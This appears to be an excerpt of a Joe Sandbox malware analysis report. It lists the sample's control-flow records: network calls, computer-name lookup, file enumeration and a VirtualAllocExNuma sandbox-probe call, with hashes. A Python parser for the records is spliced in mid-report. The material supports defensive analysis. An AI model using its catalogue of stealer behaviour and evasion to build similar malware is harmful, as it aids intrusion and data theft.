                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C729EB4291240EFCB86EF19ED99811B7AAFB8D306316816DD87587374F7B1AC10DB09

Control-flow Graph
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0043D5C8
• InternetOpenA.WININET ref: 0043D66B
• InternetOpenA.WININET ref: 0043D698
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InternetOpen$CreateDirectory
• String ID:
• API String ID: 1348255353-0
• Opcode ID: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
• Instruction ID: 6651fc40df9015f60e6afa682878b20fc325aeecd42d68c33a1dafcfb698edc4
• Opcode Fuzzy Hash: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
• Instruction Fuzzy Hash: C8711272B002148FCB51DF6CDC91BA9B3F5BF88604F04467DE819D3351EB70AA998B5A

Control-flow Graph: control_flow_graph 91 417e7d-417f47 HttpOpenRequestA
APIs
• HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: HttpOpenRequest
• String ID: GET
• API String ID: 1984915467-1805413626
• Opcode ID: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
• Instruction ID: 8e83dcfa2c2d97efb602a18a9ba3dc01c5ea0efa355a390095ddbcd516262747
• Opcode Fuzzy Hash: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
• Instruction Fuzzy Hash: D6012CB5F15229DFE710DFA8CC80E7B77F9EB48700B154024E910E7321E6B49C018B65

Control-flow Graph: control_flow_graph 94 417ec8-417f47 HttpOpenRequestA
APIs
• HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: HttpOpenRequest
• String ID: GET
• API String ID: 1984915467-1805413626
• Opcode ID: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
• Instruction ID: 746a938a8d7015067999d655a9801a7b5ec994f78fa219be27d916c50eeeb009
• Opcode Fuzzy Hash: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
• Instruction Fuzzy Hash: 2401EC75F11129DFE710DFA8DC80E7B77F9EB48710B058124E910E7325E7B598118B65

Control-flow Graph: control_flow_graph 97 440f40-44138d LoadLibraryA 122 441399-4413c0 97->122
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?), ref: 00441370
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          • Opcode ID: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
                                                                                                                                                                                                                          • Instruction ID: 4376c3151c101c1f2856b8dd4cb0e85140bd373f91dae02cc3ec93c000e5ac0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09C17779606600DFCB04DF6ADC58910B7A6EB883053D5A06DD80A8777EEBF15C93CB0A

Control-flow Graph
Block 123 (414de8-414ebd, calls InternetCrackUrlA) -> block 131 (414ec1-414ecb)
APIs
• InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00414EAE
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: CrackInternet
• String ID:
• API String ID: 1381609488-0
• Opcode ID: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
• Instruction ID: ad51b445d1971d488cb6eb1a7ddcfcdc88647cb932c96ebc81f61fd4cf75d457
• Opcode Fuzzy Hash: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
• Instruction Fuzzy Hash: 00212B756002049FDB40CF6ADC84E5A77E4FF48214B058175F808C7322D7B4EE568BAA

Control-flow Graph
Block 132 (417d09-417dbb, calls InternetOpenA) -> block 137 (417dc4-417de0)
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: InternetOpen
• String ID:
• API String ID: 2038078732-0
• Opcode ID: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
• Instruction ID: d799e9cda3f15cb694ab0866f120829321f9a12d57094e41915ee2447f8f2554
• Opcode Fuzzy Hash: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
• Instruction Fuzzy Hash: C321A131A102188FCB00EFA8DC80E9A77F5FF8C304B148128E95597322FBB0A906CF95

Control-flow Graph
Block 138 (418160-418182, calls InternetCloseHandle) -> block 139 (418185)
APIs
• InternetCloseHandle.WININET ref: 00418166
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: CloseHandleInternet
• String ID:
• API String ID: 1081599783-0
• Opcode ID: 344a25893a46580cdbb853dae8e3f6e82f140c582bf9eaf235203a2b7d6ff21c
• Instruction ID: ae5e315c54a7670b2249e5b0f3bdf6a6f2b00f65773975af1cbbced8fcde3caa
• Opcode Fuzzy Hash: 344a25893a46580cdbb853dae8e3f6e82f140c582bf9eaf235203a2b7d6ff21c
• Instruction Fuzzy Hash: 7601FB36B0522DDFDB00EF98EC80E9A73B4FF58218B114465E92597321EBB0AA16CF55

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 145 417f58-417fa2 HttpSendRequestA 147 417fa9-417fcb 145->147
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: HttpRequestSend
• String ID:
• API String ID: 360639707-0
• Opcode ID: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
• Instruction ID: c5f7f24f37b68b0ee58fd2f50e06334a253e74aa66ac9acfdd0b5a5957e02501
• Opcode Fuzzy Hash: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
• Instruction Fuzzy Hash: 2601A470A102199FE760EF68DC84F5637B8AB8C700F01467CF715E72E2EAB09841CB15

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 148 431480-4314c6 GetComputerNameA
APIs
• GetComputerNameA.KERNEL32(00000000), ref: 004314B3
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: the same ten dump files listed under the previous entry
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
• Instruction ID: fbecf42e50bf32649b0f86ce1194af764c2ba67d61e8489f1122926f9e73325e
• Opcode Fuzzy Hash: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
• Instruction Fuzzy Hash: 84E06DB17021006FDB58DF2DDCD5F6B72ED9BC9254B0A4028F804D7361EA74AC10C669

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 154 4010c6-40110d VirtualAllocExNuma
APIs
• VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043E8BB), ref: 004010F7
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: the same ten dump files listed under the previous entry
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: AllocNumaVirtual
• String ID:
• API String ID: 4233825816-0
• Opcode ID: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
• Instruction ID: d15b9f596ca57768b7915b5c70adcfe063bff0d2da7a8f47b6d44be3499abacb
• Opcode Fuzzy Hash: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
• Instruction Fuzzy Hash: 2FE09275A063508FD704FF7CDD8175933E0AF85605F05915CD884A7366EB30A99487C5

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 156 417e16-417e67 InternetConnectA
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: the same ten dump files listed under the previous entry
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: ConnectInternet
• String ID:
• API String ID: 3050416762-0
• Opcode ID: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
• Instruction ID: 39c588309585c59699f010394ec1bf5a852f07e64b85a41ba6658fda9e5a6e49
• Opcode Fuzzy Hash: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
• Instruction Fuzzy Hash: 51F01C709097128FE314DF69D48066AB7F1BFC4646F14C62DE49497325EB709492CB46
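The per-function records above share one fixed layout: a "Control-flow Graph" header, a `control_flow_graph` line listing basic-block nodes as `<id> <start>-<end> [ApiName]` plus `<id>-><id>` edges, an optional "APIs" list of `Api.MODULE(args), ref: <call address>` bullets, and "Similarity" key/value bullets carrying the API ID and fuzzy hashes. When triaging a report this size it is quicker to pull those records into a table than to scroll them. The parser below is an added example and is not Joe Sandbox code; the layout is inferred from the entries on this page, the function names are this example's own, and the embedded `SAMPLE` text is a constructed abridgement of the HttpSendRequestA, GetComputerNameA and VirtualAllocExNuma entries above (dump-source lines omitted).

```python
"""Parse Joe Sandbox 'Control-flow Graph' disassembly records into dicts.

Added example, not Joe Sandbox code. The record layout (header line, a
'control_flow_graph' node list, optional 'APIs' bullets, then key/value
bullets) is inferred from the entries on this page; function names are
this example's own.
"""
import re
from typing import Dict, List

# Constructed sample: three records abridged from the entries above
# (dump-source lines and 'Download File' link residue dropped).
SAMPLE = """\
Control-flow Graph
• Executed
• Not Executed
control_flow_graph 145 417f58-417fa2 HttpSendRequestA 147 417fa9-417fcb 145->147
APIs
Similarity
• API ID: HttpRequestSend
• API String ID: 360639707-0

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 148 431480-4314c6 GetComputerNameA
APIs
• GetComputerNameA.KERNEL32(00000000), ref: 004314B3
Similarity
• API ID: ComputerName
• Instruction Fuzzy Hash: 84E06DB17021006FDB58DF2DDCD5F6B72ED9BC9254B0A4028F804D7361EA74AC10C669

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 154 4010c6-40110d VirtualAllocExNuma
APIs
• VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043E8BB), ref: 004010F7
Similarity
• API ID: AllocNumaVirtual
"""

# One CFG node: "<id> <start>-<end> [ApiName ...]"; edges are "<id>-><id>".
NODE_RE = re.compile(r"(\d+) ([0-9a-fA-F]+)-([0-9a-fA-F]+)((?:\s+[A-Za-z_]\w*)*)")
EDGE_RE = re.compile(r"(\d+)->(\d+)")
# One API bullet: "• Api.MODULE(args), ref: <call address>"
CALL_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*?)\), ref: ([0-9A-Fa-f]+)")
KV_RE = re.compile(r"•\s*([^:]+):\s*(.*)")


def parse_records(text: str) -> List[Dict]:
    """Split on the 'Control-flow Graph' header and parse each record."""
    records = []
    for chunk in text.split("Control-flow Graph")[1:]:
        rec: Dict = {"nodes": [], "edges": [], "calls": [], "meta": {}}
        for line in chunk.splitlines():
            line = line.strip()
            if line.startswith("control_flow_graph"):
                for nid, lo, hi, apis in NODE_RE.findall(line):
                    rec["nodes"].append({"id": int(nid), "start": int(lo, 16),
                                         "end": int(hi, 16), "apis": apis.split()})
                rec["edges"] = [(int(a), int(b)) for a, b in EDGE_RE.findall(line)]
            elif m := CALL_RE.match(line):   # must be tried before KV_RE
                api, module, args, ref = m.groups()
                rec["calls"].append({"api": api, "module": module,
                                     "args": args.split(","), "ref": int(ref, 16)})
            elif m := KV_RE.match(line):
                rec["meta"][m.group(1).strip()] = m.group(2).strip()
        if rec["nodes"]:
            rec["start"] = min(n["start"] for n in rec["nodes"])
            records.append(rec)
    return records


def api_call_sites(records: List[Dict]) -> Dict[str, List[int]]:
    """Map each API to the addresses of the call instructions that reach it."""
    sites: Dict[str, List[int]] = {}
    for rec in records:
        for call in rec["calls"]:
            sites.setdefault(call["api"], []).append(call["ref"])
    return sites


def functions_calling(records: List[Dict], api: str) -> List[int]:
    """Start addresses of functions whose CFG nodes reference `api`."""
    return sorted(rec["start"] for rec in records
                  if any(api in n["apis"] for n in rec["nodes"]))


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for api, refs in api_call_sites(recs).items():
        print(f"{api:20s} called at {[hex(r) for r in refs]}")
    for api in ("HttpSendRequestA", "GetComputerNameA", "VirtualAllocExNuma"):
        print(f"{api:20s} in functions {[hex(a) for a in functions_calling(recs, api)]}")
```

Run against the full report text, `api_call_sites` gives the exact call addresses to set breakpoints on (for example the VirtualAllocExNuma call at 004010F7, a call commonly used as a sandbox probe), and `functions_calling` gives the function start addresses to jump to in IDA, while the `Instruction Fuzzy Hash` values kept in `meta` can be pivoted against other reports. Records whose "APIs" list did not survive extraction, like the HttpSendRequestA entry above, still yield their nodes and edges from the `control_flow_graph` line.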
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
                                                                                                                                                                                                                          • Instruction ID: fde5f217f82ebe29c984b4a8bf476fe36905b452798d5d1b4171e59d2cf25e0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BE02232E453642BE214AB7CCC4896777DAAF85244B098628E840CB322FA21EE40C2C4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                                                          • Opcode ID: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
                                                                                                                                                                                                                          • Instruction ID: 0df1f5f79d30fcabe98c6cb3613603f4b5a0cecef6749fcbca2d7a1ce428ac3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D092317043158FC744CF59ECC4A8A77A6AF896163189568E009CB22ADA31ED92CA88
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0041E42B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 1974802433-4000257214
                                                                                                                                                                                                                          • Opcode ID: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
                                                                                                                                                                                                                          • Instruction ID: 444d2139b4423df7e404c14bc0898a50738c756d6f3279185a54cc7c24eee840
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A2162B67001549FC704DF6CDDE0EA933B9EBC9604B084168E915E3362E6B4AE14CB59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00420455
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                                                                          • Instruction ID: 09395c8a0eafa750aeaa3e373b0b01c6308d5a6badcce2baeb186db3cbc76868
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5314BB5702954AFD700DFACEC98E5D7BE5FF98300B044068E859D7361EAB8AE058B45
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00424A63
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                                                                          • Instruction ID: 12d9cbd333469b35ebce06d581e83ce10451d2d381d02456cf870b2c2c34d416
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA318BBA705104EFD708CB5CDE89E69B7F9EB893087045025E812D7360E6F5EE14CB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041FC8A
